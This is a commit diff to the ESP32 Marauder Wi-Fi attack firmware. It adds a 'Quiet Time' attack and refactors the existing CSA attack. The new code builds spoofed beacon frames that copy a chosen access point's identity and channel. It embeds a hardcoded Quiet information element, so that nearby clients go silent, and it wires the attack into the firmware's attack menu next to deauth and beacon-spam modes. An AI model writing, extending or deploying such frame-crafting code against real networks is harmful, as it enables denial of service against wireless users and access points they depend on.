Merge pull request #1134 from justcallmekoko/develop

justcallmekoko · web-flow · commit 410cca613319 · 2026-02-25T13:00:38.000-05:00
Add quiet time attack
diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp
@@ -167,6 +167,7 @@ void MenuFunctions::main(uint32_t currentTime)
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AP_SPAM) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_CSA) &&
+      (wifi_scan_obj.currentScanMode != WIFI_ATTACK_QUIET) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
@@ -230,6 +231,7 @@ void MenuFunctions::main(uint32_t currentTime)
           (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
           (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AP_SPAM) ||
           (wifi_scan_obj.currentScanMode == WIFI_ATTACK_CSA) ||
+          (wifi_scan_obj.currentScanMode == WIFI_ATTACK_QUIET) ||
           (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
           (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
           (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -333,6 +335,7 @@ void MenuFunctions::main(uint32_t currentTime)
             (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
             (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AP_SPAM) ||
             (wifi_scan_obj.currentScanMode == WIFI_ATTACK_CSA) ||
+            (wifi_scan_obj.currentScanMode == WIFI_ATTACK_QUIET) ||
             (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
             (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
             (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -400,6 +403,7 @@ void MenuFunctions::main(uint32_t currentTime)
     if ((wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM) &&
         (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AP_SPAM) &&
         (wifi_scan_obj.currentScanMode != WIFI_ATTACK_CSA) &&
+        (wifi_scan_obj.currentScanMode != WIFI_ATTACK_QUIET) &&
         (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
         (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
         (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
@@ -1938,6 +1942,11 @@ void MenuFunctions::RunSetup()
     this->drawStatusBar();
     wifi_scan_obj.StartScan(WIFI_ATTACK_CSA, TFT_GREEN);
   });
+  this->addNodes(&wifiAttackMenu, "Quiet Time", TFTRED, NULL, BEACON_LIST, [this]() {
+    display_obj.clearScreen();
+    this->drawStatusBar();
+    wifi_scan_obj.StartScan(WIFI_ATTACK_QUIET, TFT_GREEN);
+  });
 
   evilPortalMenu.parentMenu = &wifiAttackMenu;
   this->addNodes(&evilPortalMenu, text09, TFTLIGHTGREY, NULL, 0, [this]() {
diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp
@@ -2136,6 +2136,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color) {
     this->startWiFiAttacks(scan_mode, color, text_table1[51]);
   else if (scan_mode == WIFI_ATTACK_CSA)
     this->startWiFiAttacks(scan_mode, color, "CSA Attack");
+  else if (scan_mode == WIFI_ATTACK_QUIET)
+   this->startWiFiAttacks(scan_mode, color, "Quiet Attack");
   else if (scan_mode == WIFI_ATTACK_RICK_ROLL)
     this->startWiFiAttacks(scan_mode, color, text_table1[52]);
   else if (scan_mode == WIFI_ATTACK_FUNNY_BEACON)
@@ -2443,6 +2445,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
   (currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
   (currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
   (currentScanMode == WIFI_ATTACK_CSA) ||
+  (currentScanMode == WIFI_ATTACK_QUIET) ||
   (currentScanMode == WIFI_ATTACK_AUTH) ||
   (currentScanMode == WIFI_ATTACK_DEAUTH) ||
   (currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -8802,15 +8805,15 @@ void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t
   }
 }
 
-void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, bool csa) {
+void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, int scan_mode) {
   int post_ssid_len = 12;
 
   #ifndef HAS_DUAL_BAND
     set_channel = random(1,15); 
   #else
     set_channel = dual_band_channels[random(0, DUAL_BAND_CHANNELS)];
   #endif
-  if (csa) {
+  if (scan_mode == WIFI_ATTACK_CSA) {
     post_ssid_len = 18;
     while (set_channel == custom_ssid.channel) {
       #ifndef HAS_DUAL_BAND
@@ -8819,17 +8822,15 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
         set_channel = dual_band_channels[random(0, DUAL_BAND_CHANNELS)];
       #endif
     }
+  } else if (scan_mode == WIFI_ATTACK_QUIET) {
+    post_ssid_len = 44;
+    set_channel = custom_ssid.channel;
   }
   this->changeChannel(this->set_channel);
   delay(1);  
 
-  //if (custom_ssid.beacon->size() == 0)
-  //  return;
-
-
-  // Randomize SRC MAC
-  // Randomize SRC MAC
-  if (!csa) {
+  if ((scan_mode != WIFI_ATTACK_CSA) &&
+      (scan_mode != WIFI_ATTACK_QUIET)) {
     packet[10] = packet[16] = random(256);
     packet[11] = packet[17] = random(256);
     packet[12] = packet[18] = random(256);
@@ -8850,7 +8851,8 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
 
   int realLen = strlen(ESSID);
   int ssidLen = realLen;
-  if (!csa)
+  if ((scan_mode != WIFI_ATTACK_CSA) &&
+      (scan_mode != WIFI_ATTACK_QUIET))
     ssidLen = random(realLen, 33);
 
   int numSpace = ssidLen - realLen;
@@ -8860,27 +8862,55 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
   for(int i = 0; i < realLen; i++)
     packet[38 + i] = ESSID[i];
 
-  if (!csa) {
+  if ((scan_mode != WIFI_ATTACK_CSA) &&
+      (scan_mode != WIFI_ATTACK_QUIET)) {
     for(int i = 0; i < numSpace; i++)
       packet[38 + realLen + i] = 0x20;
 
     packet[50 + fullLen] = set_channel;
   }
-  
 
-  if (!csa) {
-    uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
-                            0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
+  const uint8_t* post = nullptr;
+  int post_len = 0;
 
-    for(int i = 0; i < post_ssid_len; i++) 
-      packet[38 + fullLen + i] = postSSID[i];
+  static const uint8_t post_base[] = {
+    0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
+    0x03, 0x01, 0x04
+  };
+
+  static const uint8_t post_csa[] = {
+    0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
+    0x03, 0x01, 0x00,
+    0x25, 0x03, 0x01, 0x00, 0x03
+  };
+
+  static const uint8_t post_quiet[] = {
+    0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
+    0x03, 0x01, 0x00, 0x07, 0x06, 0x55, 0x53, 0x20,
+    0x64, 0x0b, 0x14, 0x20, 0x01, 0x00, 0x05, 0x04, 0x00, 0x01,
+    0x00, 0x00, 0x32, 0x04, 0x0c, 0x12, 0x18, 0x60, 0x28, 0x06,
+    0x01, 0x05, 0xff, 0xff, 0x00, 0x64
+  };
+
+  uint8_t temp[64]; // big enough for worst case
+  if (scan_mode == WIFI_ATTACK_CSA) {
+    memcpy(temp, post_csa, sizeof(post_csa));
+    temp[12] = custom_ssid.channel;
+    temp[16] = set_channel;
+    post = temp;
+    post_len = sizeof(post_csa);
+  } else if (scan_mode == WIFI_ATTACK_QUIET) {
+    memcpy(temp, post_quiet, sizeof(post_quiet));
+    temp[12] = custom_ssid.channel;
+    post = temp;
+    post_len = sizeof(post_quiet);
   } else {
-    uint8_t postSSID[18] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
-                            0x03, 0x01, custom_ssid.channel, 0x25, 0x03, 0x01, set_channel, 0x03 };
-    for(int i = 0; i < post_ssid_len; i++) 
-      packet[38 + fullLen + i] = postSSID[i];
+    post = post_base;
+    post_len = sizeof(post_base);
   }
 
+  memcpy(packet + (38 + fullLen), post, post_len);
+
   packet[34] = custom_ssid.beacon[0];
   packet[35] = custom_ssid.beacon[1];
   
@@ -12006,10 +12036,11 @@ void WiFiScan::main(uint32_t currentTime)
     }
   }
   else if ((currentScanMode == WIFI_ATTACK_AP_SPAM) ||
-           (currentScanMode == WIFI_ATTACK_CSA)) {
+           (currentScanMode == WIFI_ATTACK_CSA) ||
+           (currentScanMode == WIFI_ATTACK_QUIET)) {
     for (int i = 0; i < access_points->size(); i++) {
       if (access_points->get(i).selected)
-        this->broadcastCustomBeacon(currentTime, access_points->get(i), currentScanMode == WIFI_ATTACK_CSA);
+        this->broadcastCustomBeacon(currentTime, access_points->get(i), currentScanMode);
     }
 
     if (currentTime - initTime >= 1000) {
diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h
@@ -153,6 +153,7 @@
 #define WIFI_SCAN_SAE_COMMIT 77
 #define WIFI_ATTACK_SAE_COMMIT 78
 #define WIFI_ATTACK_CSA 79
+#define WIFI_ATTACK_QUIET 80
 
 #define WIFI_ATTACK_FUNNY_BEACON 99 
 
@@ -619,7 +620,7 @@ class WiFiScan
     //void sendAssociationSleep(const char* ESSID, uint8_t bssid[6], int channel, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
     void broadcastRandomSSID(uint32_t currentTime);
     void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
-    void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, bool csa = false);
+    void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, int scan_mode);
     void broadcastSetSSID(uint32_t current_time, const char* ESSID);
     void RunAPScan(uint8_t scan_mode, uint16_t color);
     void RunGPSNmea();
